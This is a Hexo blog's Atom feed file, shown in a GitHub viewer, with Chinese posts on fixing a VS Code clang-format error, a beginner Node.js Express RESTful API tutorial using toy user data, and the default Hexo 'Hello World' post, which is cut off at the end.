-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
510 lines (244 loc) · 416 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>丹青</title>
<subtitle>琥珀</subtitle>
<link href="http://example.com/atom.xml" rel="self"/>
<link href="http://example.com/"/>
<updated>2022-03-18T06:03:46.018Z</updated>
<id>http://example.com/</id>
<author>
<name>MXBG</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>【VS Code】“The ‘clang-format‘ command is not available. Please check your clang-format.executable“解决</title>
<link href="http://example.com/2022/03/18/%E3%80%90VS%20Code%E3%80%91%E2%80%9CThe%20%E2%80%98clang-format%E2%80%98%20command%20is%20not%20available.%20Please%20check%20your%20clang-format.executable%E2%80%9C%E8%A7%A3%E5%86%B3/"/>
<id>http://example.com/2022/03/18/%E3%80%90VS%20Code%E3%80%91%E2%80%9CThe%20%E2%80%98clang-format%E2%80%98%20command%20is%20not%20available.%20Please%20check%20your%20clang-format.executable%E2%80%9C%E8%A7%A3%E5%86%B3/</id>
<published>2022-03-18T08:16:16.577Z</published>
<updated>2022-03-18T06:03:46.018Z</updated>
<content type="html"><![CDATA[<p>在VS Code中对C语言进行代码格式化的时候发现’clang-format’插件一直在提示报错:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">The 'clang-format' command is not available. Please check your clang-format.executable user setting and ensure it is installed.</span><br></pre></td></tr></table></figure><p>在网上找了很多方法,其中很多都在说配置文件.clang-format,但是我没整明白,最后在dynamsoft上得到了解决方案。<br>下载 <a href="http://llvm.org/releases/3.7.0/LLVM-3.7.0-win32.exe">Clang for Windows (32-bit)</a> or <a href="http://llvm.org/releases/3.7.0/LLVM-3.7.0-win64.exe">Clang for Windows (64-bit)</a>.</p><p>安装完之后将 %LLVM% \bin 添加到系统路径中.(这步在安装的时候有选项可以直接选择安装到路径中)</p><p>之后就可以用快捷键 Alter+Shift+F 在VS Code里进行格式化操作了。</p><p>参考链接:<br><a href="https://www.dynamsoft.com/codepool/vscode-format-c-code-windows-linux.html">https://www.dynamsoft.com/codepool/vscode-format-c-code-windows-linux.html</a></p>]]></content>
<summary type="html"><p>在VS Code中对C语言进行代码格式化的时候发现’clang-format’插件一直在提示报错:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class=</summary>
<category term="solution" scheme="http://example.com/tags/solution/"/>
</entry>
<entry>
<title>RESTful API</title>
<link href="http://example.com/2022/03/18/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94RESTful%20API/"/>
<id>http://example.com/2022/03/18/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94RESTful%20API/</id>
<published>2022-03-18T08:16:16.551Z</published>
<updated>2022-03-18T06:03:46.015Z</updated>
<content type="html"><![CDATA[<h2 id="什么是-REST?"><a href="#什么是-REST?" class="headerlink" title="什么是 REST?"></a>什么是 REST?</h2><p>一种软件架构风格。REST是设计风格而不是标准。REST通常基于使用HTTP,URI,和XML(标准通用标记语言下的一个子集)以及HTML(标准通用标记语言下的一个应用)这些现有的广泛流行的协议和标准。REST 通常使用 JSON 数据格式。</p><h3 id="HTTP-方法"><a href="#HTTP-方法" class="headerlink" title="HTTP 方法"></a>HTTP 方法</h3><p>以下为 REST 基本架构的四个方法:</p><ul><li><strong>GET</strong> - 用于获取数据</li><li><strong>PUT</strong> - 用于更新或添加数据</li><li><strong>DELETE</strong> - 用于删除数据</li><li><strong>POST</strong> - 用于添加数据</li></ul><hr><h3 id="RESTful-Web-Services"><a href="#RESTful-Web-Services" class="headerlink" title="RESTful Web Services"></a>RESTful Web Services</h3><p>(这部分是暂时没发现和本人所学有太大联系,就直接复制粘贴了)<br>Web service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的互操作的应用程序。<br>基于 REST 架构的 Web Services 即是 RESTful。<br>由于轻量级以及通过 HTTP 直接传输数据的特性,Web 服务的 RESTful 方法已经成为最常见的替代方法。可以使用各种语言(比如 Java 程序、Perl、Ruby、Python、PHP 和 Javascript[包括 Ajax])实现客户端。<br>RESTful Web 服务通常可以通过自动客户端或代表用户的应用程序访问。但是,这种服务的简便性让用户能够与之直接交互,使用它们的 Web 浏览器构建一个 GET URL 并读取返回的内容。<br>更多介绍,可以查看:<a href="https://www.runoob.com/w3cnote/restful-architecture.html">RESTful 架构详解</a></p><hr><h4 id="创建-RESTful"><a href="#创建-RESTful" class="headerlink" title="创建 RESTful"></a>创建 RESTful</h4><p>首先,创建一个 json 数据资源文件 users.json,内容如下:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"user1"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mahesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password1"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user2"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">2</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user3"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"ramesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password3"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"clerk"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">3</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>基于以上数据,我们创建以下 RESTful API:<br><img src="https://img-blog.csdnimg.cn/20200319181807401.png" alt="在这里插入图片描述"></p><h4 id="获取用户列表:"><a href="#获取用户列表:" class="headerlink" title="获取用户列表:"></a>获取用户列表:</h4><p>以下代码,我们创建了 RESTful API listUsers,用于读取用户的信息列表, server.js 文件代码如下所示:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/listUsers'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( data );</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>接下来执行以下命令:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>在浏览器中访问 <a href="http://127.0.0.1:8081/listUsers%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/listUsers,结果如下所示:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"user1"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mahesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password1"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user2"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">2</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user3"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"ramesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password3"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"clerk"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">3</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="添加用户"><a href="#添加用户" class="headerlink" title="添加用户"></a>添加用户</h4><p>以下代码,我们创建了 RESTful API addUser, 用于添加新的用户数据,server.js 文件代码如下所示:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//添加的新用户数据</span></span><br><span class="line"><span class="keyword">var</span> user = {</span><br><span class="line"> <span class="string">"user4"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mohit"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password4"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">4</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/addUser'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// 读取已存在的数据</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> data[<span class="string">"user4"</span>] = user[<span class="string">"user4"</span>];</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(data));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>接下来执行以下命令:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>在浏览器中访问 <a href="http://127.0.0.1:8081/addUser%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/addUser,结果如下所示:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">{ <span class="attr">user1</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mahesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password1'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">1</span> },</span><br><span class="line"> <span class="attr">user2</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'suresh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password2'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'librarian'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">2</span> },</span><br><span class="line"> <span class="attr">user3</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'ramesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password3'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'clerk'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">3</span> },</span><br><span class="line"> <span class="attr">user4</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mohit'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password4'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">4</span> } </span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="显示用户详情"><a href="#显示用户详情" class="headerlink" title="显示用户详情"></a>显示用户详情</h4><p>以下代码,我们创建了 RESTful API :id(用户id), 用于读取指定用户的详细信息,server.js 文件代码如下所示:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/:id'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// 首先我们读取已存在的用户</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> <span class="keyword">var</span> user = data[<span class="string">"user"</span> + req.<span class="property">params</span>.<span class="property">id</span>] </span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( user );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(user));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>接下来执行以下命令:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>在浏览器中访问 <a href="http://127.0.0.1:8081/2%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA">http://127.0.0.1:8081/2,结果如下所示</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"name"</span>:<span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span>:<span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span>:<span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>:<span class="number">2</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="删除用户"><a href="#删除用户" class="headerlink" title="删除用户"></a>删除用户</h4><p>以下代码,我们创建了 RESTful API deleteUser, 用于删除指定用户的详细信息,以下实例中,用户 id 为 2,server.js 文件代码如下所示:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> id = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/deleteUser'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="comment">// First read existing users.</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> <span class="keyword">delete</span> data[<span class="string">"user"</span> + id];</span><br><span class="line"> </span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(data));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>接下来执行以下命令</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>在浏览器中访问 <a href="http://127.0.0.1:8081/deleteUser%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/deleteUser,结果如下所示:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">{ <span class="attr">user1</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mahesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password1'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">1</span> },</span><br><span class="line"> <span class="attr">user3</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'ramesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password3'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'clerk'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">3</span> } </span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>还是复制粘贴……因为这还是举例部分……</p><blockquote><p>乱码问题:<br>除了不是文件读取的编码问题,可以考虑为浏览器自动为没有在 html > head 中解释编码的 html 编码为本地默认编码。可以主动添加 head:<br><code>res.setHeader('Content-Type', 'text/html; charset=utf8');</code></p></blockquote><p>本篇博客是参考<a href="https://www.runoob.com/nodejs/nodejs-restful-api.html">Node.js菜鸟教程</a>,详情可跳至<a href="https://www.runoob.com/nodejs/nodejs-restful-api.html">菜鸟教程</a>。</p><hr><p>后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><h2 id="什么是-REST?"><a href="#什么是-REST?" class="headerlink" title="什么是 REST?"></a>什么是 REST?</h2><p>一种软件架构风格。REST是设计风格而不是标准。REST通常基于使用HTTP,URI</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>Hello World</title>
<link href="http://example.com/2022/03/18/hello-world/"/>
<id>http://example.com/2022/03/18/hello-world/</id>
<published>2022-03-18T07:00:21.920Z</published>
<updated>2022-03-18T07:00:21.920Z</updated>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 